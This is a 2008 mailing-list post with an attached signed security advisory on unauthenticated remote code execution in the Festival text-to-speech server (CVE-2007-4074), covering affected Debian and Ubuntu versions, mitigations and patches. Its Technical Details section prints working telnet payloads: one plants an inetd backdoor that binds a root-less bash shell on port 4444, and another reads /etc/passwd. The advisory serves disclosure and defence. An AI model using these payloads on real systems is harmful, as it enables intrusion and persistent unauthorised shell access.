--Boundary-00=_OcW9H5Kxi8CNemD
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
It has been recently been identified that the Festival text to speech server
was vulnerable to unauthenticated remote code execution. Further research
indicated that this vulnerability has already been reported as a local
privilege escalation against both the Gentoo and SuSE GNU/Linux distributions
and had assigned CVE-2007-4074. The remote form of this vulnerability was
originally identified in the default configuration of Festival 1.96~beta-5 as
distributed in Debian unstable but Ubuntu Hardy Heron was also affected. Both
Debian and Ubuntu have since released patches to resolve this flaw. An
advisory for this flaw which provides further information is attached. A
short analysis of Debian's response can be found at
http://www.nth-dimension.org.uk/blog.php?id=68.
Cheers,
Tim
--
Tim Brown
--Boundary-00=_OcW9H5Kxi8CNemD
Content-Type: application/pgp-keys;
name="NDSA20080215.txt.asc"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="NDSA20080215.txt.asc"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown
URL: /
Product: Festival 1.96:beta July 2004
Vendor: Centre for Speech Technology Research, University of Edinburgh
Risk: Medium
Summary
The Festival server is vulnerable to unauthenticated remote code execution.
Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux
distributions and was assigned CVE-2007-4074.
The remote form of this vulnerability was identified in 1.96~beta-5 as
distributed in Debian unstable but it is also believed that Ubuntu Hardy
Heron was affected.
Technical Details
The Festival server which can be started using festival --server is vulnerable
to unauthenticated remote command execution due to the inclusion of a scheme
interpreter. It is possible to make use of standard scheme functions in order
to execute further code, like so:
$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")
Connection closed by foreign host.
Whilst this is the most trivial way that the vulnerability can be exploited
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack. Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:
$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)
Whilst it is acknowledged that the inclusion of the scheme interpreter in this
manner is entirely intentional, the default behaviour of the server could be
exploited particularly where the user is unaware of the servers existance. In
the case of both Debian unstable and Ubuntu Hardy Heron, this meant that the
server was likely to be started by the init subsystem albeit as a non-privileged
user.
Solutions
In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall. The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.
Following vendor notification on the 16th Febuary 2007 (Debian) and 2nd March 2007
(Ubuntu), both issued patched versions in their respective distributions which
document the possible security issue and how it can be resolved and change the
default behaviour of the package to prevent the server being started by the init
subsystem. Details of the Debian changes can be found firstly in bug #466146
and then #466796. Nth Dimension would recommend that the patches for these bugs
are applied. Nth Dimension would like to thank the Debian package maintainer
Kumar Appaiahi as well as Nico Golde of Debian testing security and Jamie
Strandboge of Canonical for the way they worked to resolve the issue.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFH9VORVAlO5exu9x8RAj8RAJ9FTxsDc5sQrIpIyNTStiaui5zISwCeMPiW
+wuTceT8SGnNjV9mUsilh0w=dOSa
-----END PGP SIGNATURE-----
--Boundary-00=_OcW9H5Kxi8CNemD--